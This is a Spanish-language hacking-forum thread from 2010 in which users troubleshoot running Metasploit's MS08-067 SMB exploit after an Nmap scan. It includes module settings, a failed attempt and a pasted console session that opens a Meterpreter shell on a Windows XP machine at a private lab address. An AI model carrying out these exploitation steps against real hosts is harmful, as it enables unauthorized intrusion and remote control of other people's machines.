Ayuda Nmap y Metasploit

Iniciado por cpu2, 3 Enero 2010, 18:19 PM

0 Miembros y 1 Visitante están viendo este tema.

Shell Root

Pwned, como bien lo dijistes

Cita de: cpu2 en  3 Enero 2010, 18:19 PMPORT     STATE SERVICE
6551/tcp open  bittorrent-tracker

Como ves esta abierto el puerto 6551/tcp y el con el exploit windows/smb/ms08_067_netapi debe de estar abierto el puerto 445

Verificalo en el RPORT
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

Masita

#11
Cita de: Shell Root en  7 Enero 2010, 18:36 PM
Cita de: Masita en  7 Enero 2010, 18:31 PMNo soy un experto en metasploit pero creo que se cual es el fallo. El RHOST si no me equivoco es una funcion del payload asi que primera indica cual es el payload y despues ya indicas el RHOST.
No el RHOST es el HostRemoto, se indica al momento de escoger el PAYLOAD y/o exploit. El PAYLOAD es la accion a realizarse si se ejecuta el Exploit Correctamente.

Se que el payload es la accion y el rhost el host remoto si lo sabia, pero creia que tenias que declararlos uno despues del otro. Ya que dependiendo del payload tienes unas "options" u otras. Ademas no me habia fijado en el error en concreto mea culpa.  :silbar:
En el cielo estan suspendidas las palabras que cantamos en nuestros sueños....

rockernault





cpu2

Gracais a todos por ayudarme y contestar tan rapido

Shell Root
Nada e visto los 2 videos los e probado y nada me dice lo mismo en el segunbdo video que haces un payload windows/shell/reverse_tcp, cuando metes el RHOST 192.168.0.3 es tu ip? por que yo puse la mia y nada no funciona alguna idea?

rokernault

Como le exploto una vulnerabilidad de samba en un puerto de bittorrent a eso de samba me suena a algo de linux aa vaya imagen as puesto tio jeje.

Un saludo

Shell Root

#14
cpu2, a ver,

1. RHOST= Host_Remoto; LHOST= Host_Local
   RPORT= Puerto_Remoto; LPORT= Puerto_Local

2. El exploit que estas usando windows/smb/ms08_067_netapi no funciona en ese sistema, porque?
Cita de: cpu2 en  3 Enero 2010, 18:19 PMPORT     STATE SERVICE
6551/tcp open  bittorrent-tracker

Como ves esta abierto el puerto 6551/tcp y el con el exploit windows/smb/ms08_067_netapi debe de estar abierto el puerto 445. Verificalo en el RPORT con el comando Show Options, aunque se puede cambiar el puerto, pero pfff nose...

Saludos!
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

rockernault





cpu2

Shell Root mira es lo que me sale ami

use exploit/windows/smb/ms08_067_netapi   <------------- ningun problema

show options

Module options:
Name     Current Setting  Required  Description
---------   ------------------  ------------  -------------
RHOST                                  yes         The target address
RPORT   445                         yes         Set the SMB service port
SMBPIPE  BROWSER           yes         The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id  Name
--  ----
0   Automatic Targeting

Vale me sale eso por lo que e visto en el video todo igual

set RHOST 192.168.1.32

set payload windows/shell/bind_tcp

show options

Module options:
Name     Current Setting  Required  Description
---------   ------------------  ------------  -------------
RHOST   192.168.132      yes            The target address
RPORT   445                    yes            Set the SMB service port
SMBPIPE  BROWSER     yes             The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell/bind_tcp):
Name     Current Setting  Required  Description
---------   ------------------  ------------  -------------
EXITFUNC   thread            yes          Exit technique: seh, thread, process
LPORT         4444               yes          The local port
LHOST      192.168.1.32     no           The target address

Exploit target:
Id  Name
--  ----
0   Automatic Targeting

eso sale

exploit

   *  Started bind handler
     [-] Exploit failed: The host (192.168.1.32:445) was unreachable.
   * Exploit completed, but no session was created.

eso es mi caso alguna idea creo que lo ago bien?
Un saludo


Shell Root

#17
1. Ingresando RHOST y LHOST iguales, WTF!
   No tiene problema, pero jajaja es raro, prefiero crearme tan siquiera una Maquina Virtual. :·P
2. Importante: La maquina a la que deseas ingresar con el exploit, no es vulnerable a ese exploit... xD

Cita de: Shell Root en  7 Enero 2010, 19:25 PM2. El exploit que estas usando windows/smb/ms08_067_netapi no funciona en ese sistema, porque?
Cita de: cpu2 en  3 Enero 2010, 18:19 PMPORT     STATE SERVICE
6551/tcp open  bittorrent-tracker

Como ves esta abierto el puerto 6551/tcp y el con el exploit windows/smb/ms08_067_netapi debe de estar abierto el puerto 445. Verificalo en el RPORT con el comando Show Options, aunque se puede cambiar el puerto, pero pfff nose...

Saludos!

Saludos!
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

rockernault

CitarModule options:
Name     Current Setting  Required  Description
---------   ------------------  ------------  -------------
RHOST   192.168.132      yes            The target address
RPORT   445                    yes            Set the SMB service port
SMBPIPE  BROWSER     yes             The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell/bind_tcp):
Name     Current Setting  Required  Description
---------   ------------------  ------------  -------------
EXITFUNC   thread            yes          Exit technique: seh, thread, process
LPORT         4444               yes          The local port
LHOST      192.168.1.32     no           The target address

mira bien las ip..

da igual, la maquina no es vulnerable




Shell Root

Cita de: rockernault en  7 Enero 2010, 20:16 PMmira bien las ip..

No tiene nada que ver, mira.

Citar

               |                    |      _) |  
__ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
|   |   |  __/ |   (   |\__ \ |   | | (   | | |  
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
                             _|                  



      =[ metasploit v3.3.2-release [core:3.3 api:1.0]
+ -- --=[ 462 exploits - 219 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
      =[ svn r7808 updated 28 days hago (2009.12.10)


msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.2
LHOST => 192.168.0.2
msf exploit(ms08_067_netapi) > exploit

  • Started reverse handler on port 4444
  • Automatically detecting the target...
  • Fingerprint: Windows XP Service Pack 2 - lang:Spanish
  • Selected Target: Windows XP SP2 Spanish (NX)
  • Triggering the vulnerability...
  • Sending stage (723456 bytes)
    • Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.2:9121)[/b]

      meterpreter >
Saludos!
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.